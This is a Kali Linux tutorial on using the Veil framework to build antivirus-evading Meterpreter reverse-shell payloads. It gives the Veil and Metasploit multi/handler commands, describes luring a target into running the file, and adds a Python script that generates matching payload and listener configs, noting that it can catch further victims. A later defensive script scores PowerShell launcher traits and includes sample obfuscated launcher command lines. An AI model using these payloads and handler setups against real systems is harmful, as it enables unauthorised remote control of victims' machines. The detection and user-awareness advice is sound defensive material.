Anti-Virus Bypass with Veil on Kali Linux

One of the common hurdles for Ethical Hackers and Penetration Testers is bypassing anti-virus on target systems. Veil uses a Metasploit-like interface to create a remote shell payload that is designed to evade detection by many anti-virus products. A little social engineering is required to get the target to run the resulting program, but if they do, it connects back to the Kali system and gives the attacker full remote access.

In this article we will discuss how to install and run Veil on Kali Linux. Since the previous version of this article there have been several changes to Veil. The first is that it is now much easier to install and run on Kali Linux: Veil directly supports Kali 2018 and installs with only two commands. Another change is that Veil includes new payloads written in additional languages.

Read more about the updates at https://www.veil-framework.com/.

INSTALLING VEIL

Tool GitHub Page: https://github.com/Veil-Framework/Veil

Installing Veil 3.x on Kali 2018 is very simple:

[Screenshot: the two install commands]

The install will then run for a while as the dependency packages are installed. Reboot when finished.

STARTING VEIL

Now let’s look at using Veil.

  • In a terminal window, enter “veil”.

[Screenshot: Veil main menu]

Veil offers two tools: Evasion (payload generation) and Ordnance (shellcode generation). We want to run Veil-Evasion.

  • Enter “use 1”.

[Screenshot: Veil-Evasion menu]

The Veil title menu bar should change to “Veil-Evasion”.

USING VEIL-EVASION

The first thing to do is to list the available payloads using the “list” command.

  • Type “list” and then press enter.

[Screenshot: Veil-Evasion payload list]

PowerShell attacks are very popular, so let’s use a PowerShell payload. Select a payload with the “use” command followed by its number in the list. The number is simply its position in that list, so check the output of “list” on your own install rather than assuming it will be 22. In this tutorial we will use the “powershell/meterpreter/rev_tcp.py” payload.

  1. Type, “use 22” and hit “enter”.

This will select the payload and present us with the following screen:

[Screenshot: powershell/meterpreter/rev_tcp payload options]

If you look at the options, you will notice that it looks (and acts) very similar to using Metasploit modules. For this module we will just need to set the LHOST variable to our Kali system IP address.

2. Type, “set LHOST 192.168.1.39” and then hit “enter”.

3. Now enter, “options” to view the value that we just set:

[Screenshot: payload options with LHOST set]

We will leave the LPORT set to the default value of 4444. Now we just need to generate the payload.

4. Enter “generate”.

Veil will now build the payload with the options that we chose.

5. Now we need to give our created file a filename or base name; I chose “CutePuppy”.

Veil-Evasion now has all that it needs and creates our payload file. We should see something like the following output:

[Screenshot: Veil-Evasion generation output showing the payload used and the output file path]

This screen shows which payload was used and where the output file was written; in this instance it went to the “/var/lib/veil/output/source/” directory. When the file (CutePuppy.bat here) is run on a Windows system it will try to connect out to our Kali machine, so before that happens we need a Metasploit handler listening for the connection. The handler runs in Metasploit and waits until the batch file is opened; once it executes, a Meterpreter session is opened from the Windows system back to the Kali box.

GETTING A REMOTE SHELL

To create the remote handler, we will be using Metasploit. You can use the RC file generated by Veil, but I prefer to do it manually.

  1. Start the Metasploit Framework from the Kali Quick Start menu.
  2. Now set up the multi/handler using the following settings:
  • use multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.1.39
  • set LPORT 4444
  • exploit
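The payload options and the handler above have to agree exactly: a reverse_tcp payload only ever calls back to the LHOST and LPORT it was generated with, and a handler started with the wrong PAYLOAD gives you a connection that dies during staging. The script below is an added example (it is not code from Veil or Metasploit, and not part of the original article) that derives both the non-interactive Veil command line and the msfconsole resource file from a single set of values, so the two cannot drift apart. It assumes Veil 3’s command-line flags (-t, -p, --ip, --port, -o) as documented in the Veil README, and the payload mapping it contains covers only the two Veil payloads used in this article.

```python
"""Derive the Veil command line and its Metasploit handler from one config.

Added example, not part of Veil or Metasploit. A reverse_tcp payload only
calls back to the LHOST/LPORT compiled into it, so the listener must use the
same values and the matching PAYLOAD; generating both from one place removes
the usual typo. Assumptions: Veil 3's command-line flags (-t, -p, --ip,
--port, -o) as documented in the Veil README, and the payload mapping below,
which covers only the two Veil payloads used in this article.
"""
import ipaddress
import shlex

# Veil payload -> Metasploit payload the handler must stage. Both Veil
# payloads embed 32-bit meterpreter shellcode, hence windows/ not windows/x64/.
VEIL_TO_MSF = {
    "powershell/meterpreter/rev_tcp.py": "windows/meterpreter/reverse_tcp",
    "c/meterpreter/rev_tcp.py": "windows/meterpreter/reverse_tcp",
}


def config_errors(payload, lhost, lport):
    """Return a list of problems with the options; an empty list means usable."""
    errors = []
    if payload not in VEIL_TO_MSF:
        errors.append(f"no handler mapping for Veil payload {payload!r}")
    try:
        ipaddress.IPv4Address(lhost)
    except ValueError:
        errors.append(f"LHOST {lhost!r} is not an IPv4 address")
    try:
        port_ok = 1 <= int(lport) <= 65535
    except (TypeError, ValueError):
        port_ok = False
    if not port_ok:
        errors.append(f"LPORT {lport!r} is out of range")
    return errors


def veil_command(payload, lhost, lport, name):
    """Non-interactive equivalent of use / set LHOST / set LPORT / generate."""
    errs = config_errors(payload, lhost, lport)
    if errs:
        raise ValueError("; ".join(errs))
    return shlex.join(["veil", "-t", "Evasion", "-p", payload,
                       "--ip", lhost, "--port", str(lport), "-o", name])


def handler_rc(payload, lhost, lport):
    """msfconsole resource file for the multi/handler matching the payload."""
    errs = config_errors(payload, lhost, lport)
    if errs:
        raise ValueError("; ".join(errs))
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {VEIL_TO_MSF[payload]}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",  # keep listening after the first callback
        "exploit -j -z",            # background job; attach with sessions -i
        "",
    ])


if __name__ == "__main__":
    opts = ("powershell/meterpreter/rev_tcp.py", "192.168.1.39", 4444)
    print(veil_command(*opts, "CutePuppy"))
    with open("handler.rc", "w") as fh:
        fh.write(handler_rc(*opts))
    print("wrote handler.rc; start it with: msfconsole -q -r handler.rc")
```

Run the printed veil command on the Kali box, start the listener with “msfconsole -q -r handler.rc”, and then deliver the generated file; because ExitOnSession is false the handler keeps listening, so a second victim opening the same file gets a second session instead of an unanswered connection.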

This starts the multi handler on the Kali System:

[Screenshot: Metasploit multi/handler listening]

Now we just need the target computer to run the file that Veil generated.

3. Copy “CutePuppy.bat” to your Windows Desktop:

[Screenshot: CutePuppy.bat on the Windows desktop]

4. Now, double click on the .bat file to run it.

Nothing appears to happen, but on your Kali system, you should see this:

[Screenshot: Meterpreter session opened in Metasploit]

A reverse shell session!

5. Now if we type “shell”, we see that we do in fact have a complete remote shell:

[Screenshot: Windows command shell from the Meterpreter session]

The big question is, can this bypass anti-virus? At the time of this writing I ran the PowerShell based CutePuppy.bat file on a fully updated Windows 10 system running an updated Anti-Virus and it did detect it as malicious.

Anti-Virus engines have become much better at detecting PowerShell based threats. There are other options you can use in Veil. I will not cover this step by step, but using the “c/meterpreter/rev_tcp.py” payload provided different results.

Generating it into a test.exe file:

[Screenshot: generating the c/meterpreter/rev_tcp payload as test.exe]

We have a shell:

[Screenshot: Meterpreter session from test.exe]

CONCLUSION

Hopefully this article has shown that you cannot rely on anti-virus alone to protect you from online threats. Unfortunately, sometimes your network security depends on your users and what they allow to run. Instruct your users to be very wary of internet links and never to open attachments that arrive in unsolicited e-mails. Blocking certain file types (such as batch files and executables) from entering or leaving your network is also a good idea.

Finally, use a Network Security Monitoring system (and logs) to help track down what happened and what was compromised if the worst does happen.
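Following on from the advice above to lean on monitoring and logs, here is an added example (not part of Veil, Metasploit or this article’s original text) of the kind of check a defender can run over process-creation telemetry. It scores PowerShell launches on traits a batch-file launcher like the one generated above tends to share: a hidden window, an execution-policy bypass, no profile, an encoded command or in-memory decoding, a cmd.exe parent running a .bat, and 32-bit PowerShell on a 64-bit host. It assumes Sysmon event 1 or Security event 4688 records (with command-line auditing enabled) exported as tab-separated Key=Value fields; the four sample events are constructed for this example, not captured from a real host.

```python
"""Triage process-creation events for PowerShell launcher tradecraft.

Added example for the monitoring advice in this article; it is not part of
Veil or Metasploit. Input is assumed to be Sysmon event 1 (or Security event
4688 with command-line auditing) exported as tab-separated Key=Value fields.
The sample events are constructed for this example, not real telemetry.
"""
import re

# (label, regex applied to the PowerShell command line, weight)
INDICATORS = [
    ("hidden window",
     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("execution policy bypass",
     re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I), 2),
    ("no profile / non-interactive",
     re.compile(r"-no(?:p|profile|ni|ninteractive)\b", re.I), 1),
    ("encoded command",
     re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("in-memory decode and eval",
     re.compile(r"FromBase64String|DeflateStream|GzipStream|Invoke-Expression|\biex\b", re.I), 3),
]
ALERT_THRESHOLD = 5  # tune against your own baseline of admin scripting


def parse_event(line):
    """Turn 'Key=Value<TAB>Key=Value' into a dict; values may contain '='."""
    fields = {}
    for chunk in line.split("\t"):
        key, _, value = chunk.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def score_event(ev):
    """Return (score, matched indicator labels) for one parsed event."""
    image = ev.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []                      # only PowerShell launches are scored
    hits, score = [], 0
    cmdline = ev.get("CommandLine", "")
    for label, rx, weight in INDICATORS:
        if rx.search(cmdline):
            hits.append(label)
            score += weight
    parent = ev.get("ParentImage", "").lower()
    if parent.endswith("cmd.exe") and ".bat" in ev.get("ParentCommandLine", "").lower():
        hits.append("launched from a batch file")   # the .bat -> powershell chain
        score += 2
    if "\\syswow64\\" in image:
        # 32-bit shellcode needs a 32-bit host process, so launchers pick the
        # SysWOW64 PowerShell on 64-bit Windows; legitimate scripts rarely do.
        hits.append("32-bit PowerShell on 64-bit host")
        score += 1
    return score, hits


def triage(lines, threshold=ALERT_THRESHOLD):
    """Score every event line and return those at or above the threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"score": score, "indicators": hits,
                           "command_line": ev.get("CommandLine", "")})
    return alerts


# Constructed sample telemetry (not captured from a real system).
SAMPLE_EVENTS = [
    # 1. A batch-file PowerShell launcher of the kind this article generates.
    "\t".join([
        r"ParentImage=C:\Windows\System32\cmd.exe",
        r'ParentCommandLine=C:\Windows\system32\cmd.exe /c "C:\Users\dan\Desktop\CutePuppy.bat"',
        r"Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        '''CommandLine=powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('UExBQ0VIT0xERVI=')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"''',
    ]),
    # 2. A scheduled admin script: one noisy flag, but no launcher pattern.
    "\t".join([
        r"ParentImage=C:\Windows\explorer.exe",
        r"ParentCommandLine=C:\Windows\Explorer.EXE",
        r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    ]),
    # 3. An encoded one-liner spawned by Word (a macro-style delivery).
    "\t".join([
        r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        r'ParentCommandLine="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "invoice.docm"',
        r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"CommandLine=powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    ]),
    # 4. Not PowerShell at all; ignored by the scorer.
    "\t".join([
        r"ParentImage=C:\Windows\explorer.exe",
        r"ParentCommandLine=C:\Windows\Explorer.EXE",
        r"Image=C:\Windows\System32\notepad.exe",
        r"CommandLine=notepad.exe C:\Users\dan\notes.txt",
    ]),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], ", ".join(alert["indicators"]))
        print("    ", alert["command_line"][:90])
```

Treat this as a triage aid rather than a detection rule: the flags are trivially changed by an attacker, and an administrator’s “-ExecutionPolicy Bypass -File” is common enough that it should not fire alone, which is why the threshold sits above any single indicator. Pair it with PowerShell script block logging (event 4104), which records the decoded script regardless of how the launcher obfuscated it on the command line.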


Installing Veil Framework on Kali Linux

I have been notified that there are problems installing Veil Framework (AV bypass) in Kali using the apt-get install command. From the creator’s website it looks like the recommended install is now to clone Veil from the GitHub repository and then run the included setup routine.

Instructions can be found at the Veil Framework updates page, but I will include a tutorial here.

For advanced users:

$ git clone https://github.com/Veil-Framework/Veil-Evasion.git
$ cd Veil-Evasion/setup/
$ ./setup.sh

Then just follow through the install, taking the defaults.

Step-by-Step Guide

From a Kali terminal prompt type “git clone https://github.com/Veil-Framework/Veil-Evasion.git”. This will clone Veil into the “Veil-Evasion” directory. When done, change to the “Veil-Evasion/setup” directory and run “./setup.sh”:

[Screenshot: cloning Veil-Evasion and running setup.sh]

Type, “Y” when prompted to continue with install, then sit back and relax, as the next part can take a while.

At the Python setup screen just click “Next”. The Python, pywin32 and pycrypto installers that follow are Windows installers running under Wine; Veil-Evasion uses them to compile its Python payloads into Windows executables.

[Screenshot: Python setup screen]

At the Select Destination Directory screen, leave the default destination and click “Next”, then click “Yes” when prompted to overwrite existing Python files:

[Screenshot: Python Select Destination Directory screen]

Continue through Python install leaving default settings, click “Finish” when done.

The install then begins the pywin32 setup.

At the main pywin32 setup screen, press “Next” to continue:

[Screenshot: pywin32 setup screen]

Leave default values on the Python directory location screen and click “next”, then “next” again, and “finish” to complete install.

The install then begins the pycrypto setup.

At the main pycrypto setup screen, press “Next” to continue:

[Screenshot: pycrypto setup screen]

Again leave the Python information that is populated by default and click “Next”, “next” again and then “Finish” when done.

Setup will then complete. And that is it; we are now ready to run Veil!

Running Veil Evasion

From the Veil-Evasion directory, run “./Veil-Evasion.py”, and you will see the main Veil Screen:

[Screenshot: Veil-Evasion main screen]

And there you go, you are now all set to use Veil Evasion on Kali Linux!

(** Note: My book, Basic Security Testing with Kali Linux which includes a tutorial on using Veil Evasion, is in the process of being updated to reflect the install tutorial changes.)